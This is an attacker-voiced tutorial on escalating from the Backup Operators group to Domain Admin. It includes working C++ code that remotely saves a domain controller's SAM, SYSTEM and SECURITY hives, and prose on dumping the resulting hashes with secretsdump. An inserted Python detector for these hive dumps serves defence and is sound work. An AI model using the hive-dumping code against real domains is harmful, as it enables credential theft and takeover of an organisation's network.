Backup Operator to Domain Admin

Backup Operators -> Domain Admin

User management is a huge issue for enterprise IT staff. There are a lot of users to manage: local machine users, service users, domain admins, backup users, etc.

As an attacker, if you obtain any privileged user’s password or NT/LM hash, you can take over the company’s domain.

In this article, I will look at users who are members of the Backup Operators group.

Normally, tech staff use the Backup Operators group to take backups of files, folders, etc. Here is a backup operator user:

As you can see, the user is only a member of Domain Users and Backup Operators. So this user can only access the machine locally and read files and folders.

Let’s imagine that, as an attacker, we have this user’s password in clear text or as an NT/LM hash. We can read any file or folder on any machine in the domain. (Evil laugh)

We can also access the SAM, SYSTEM and SECURITY files (the registry hives) on the machine. That’s the point.

We can use the solution below to dump the SAM, SYSTEM and SECURITY files of the Domain Controller and write them to any remote share.

When you check the BackupOperatorToDA.cpp file, RegConnectRegistryW helps us access the registry remotely. Thus, we can access the SAM, SYSTEM and SECURITY registry hives. Easy!

#include <windows.h>
#include <cstdio>
#include <cstdlib>
#include <string>

// target: the remote machine (here the DC); path: the output directory on a share
// the tool can write to, ending in a backslash. Both come from the command line.
void exploit(const char* target, const char* path) {

    HKEY hklm;
    HKEY hkey;
    DWORD result;

    const char* hives[] = { "SAM","SYSTEM","SECURITY" };

    // Connect to the remote machine's HKEY_LOCAL_MACHINE over the Remote Registry service.
    result = RegConnectRegistryA(target, HKEY_LOCAL_MACHINE, &hklm);
    if (result != 0) {
        printf("RegConnectRegistryA: %lu\n", result);
        exit(0);
    }
    for (int i = 0; i < 3; i++) {
        std::string out = std::string(path).append(hives[i]);
        printf("Dumping %s hive to %s\n", hives[i], out.c_str());
        // REG_OPTION_BACKUP_RESTORE opens the key with backup intent, which is what
        // SeBackupPrivilege (held by Backup Operators) allows regardless of the key's ACL.
        result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
        if (result != 0) {
            printf("RegOpenKeyExA: %lu\n", result);
            exit(0);
        }
        // Save the hive to a file on the remote share.
        result = RegSaveKeyA(hkey, out.c_str(), NULL);
        RegCloseKey(hkey);
        if (result != 0) {
            printf("RegSaveKeyA: %lu\n", result);
            exit(0);
        }
    }
    RegCloseKey(hklm);
}
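From the defender’s side, the code above leaves a recognisable trail: a network logon to the DC followed by SeBackupPrivilege being exercised against the SAM, SYSTEM and SECURITY hives in quick succession. The detector below is an added example, not part of the original post or of BackupOperatorToDA; it assumes Audit Sensitive Privilege Use is enabled so that event 4674 is logged, and the event dicts, field names, the ACME\svc_backup allowlist and the sample records are all constructed for the example rather than taken from real logs.

```python
from collections import defaultdict

HIVES = {"SAM", "SECURITY", "SYSTEM"}   # hives the tool above saves with RegSaveKey
ALLOWLIST = {"ACME\\svc_backup"}        # assumed legitimate backup account (constructed)
WINDOW = 300                            # seconds; hives saved this close together = one dump

def hive_from_object(object_name):
    # e.g. \REGISTRY\MACHINE\SAM -> "SAM"; anything outside the three hives -> None
    parts = object_name.upper().split("\\")
    if len(parts) >= 4 and parts[1:3] == ["REGISTRY", "MACHINE"] and parts[3] in HIVES:
        return parts[3]
    return None

def detect_hive_dumps(events):
    """One alert per logon session saving >= 2 credential hives under SeBackupPrivilege
    within WINDOW; event 4624 supplies the logon type (3 = network, i.e. remote)."""
    logon_type = {}                 # logon_id -> logon type
    sessions = defaultdict(list)    # (account, logon_id) -> [(time, hive)]
    for ev in events:
        if ev["event_id"] == 4624:
            logon_type[ev["logon_id"]] = ev["logon_type"]
        elif ev["event_id"] == 4674 and "SeBackupPrivilege" in ev["privileges"]:
            hive = hive_from_object(ev["object_name"])
            if hive:
                sessions[(ev["account"], ev["logon_id"])].append((ev["time"], hive))
    alerts = []
    for (account, logon_id), hits in sessions.items():
        if account in ALLOWLIST:
            continue
        hits.sort()
        for t0, _ in hits:
            hives = {h for t, h in hits if t0 <= t <= t0 + WINDOW}
            if len(hives) >= 2:
                alerts.append({"account": account, "logon_id": logon_id, "hives": sorted(hives),
                               "remote": logon_type.get(logon_id) == 3})
                break
    return alerts

# Constructed sample (time = epoch seconds): a Backup Operators member dumping all three
# hives over a network logon, the allowlisted backup account, and one harmless SYSTEM read.
def _save(time, account, logon_id, hive):
    return {"time": time, "event_id": 4674, "account": account, "logon_id": logon_id,
            "object_name": "\\REGISTRY\\MACHINE\\" + hive, "privileges": ["SeBackupPrivilege"]}
SAMPLE_EVENTS = [
    {"time": 1000, "event_id": 4624, "account": "ACME\\backup_op", "logon_id": "0x3e7a1", "logon_type": 3},
    _save(1001, "ACME\\backup_op", "0x3e7a1", "SAM"),
    _save(1002, "ACME\\backup_op", "0x3e7a1", "SYSTEM"),
    _save(1003, "ACME\\backup_op", "0x3e7a1", "SECURITY"),
    _save(1061, "ACME\\svc_backup", "0x41b00", "SAM"),
    _save(1062, "ACME\\svc_backup", "0x41b00", "SECURITY"),
    _save(1900, "ACME\\alice", "0x52c00", "SYSTEM"),
]
```

Running `detect_hive_dumps(SAMPLE_EVENTS)` yields a single alert for ACME\backup_op with all three hives and `remote` set, while the allowlisted account and the single-hive read stay quiet.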

Let’s run.

Perfect! We already have access to the \\ACMEDC\C$ share, so we copy these files to our local machine and read the SAM file!

Impacket’s secretsdump is the perfect tool for reading the SAM file.

As you can see, we have the Administrator user of the ACME domain. But what if the default Administrator user is disabled?!

As an attacker, we already have multiple attack vectors.

We can use the $MACHINE.ACC hash to get all users of the ACME domain via ACMEDC.

Cheers !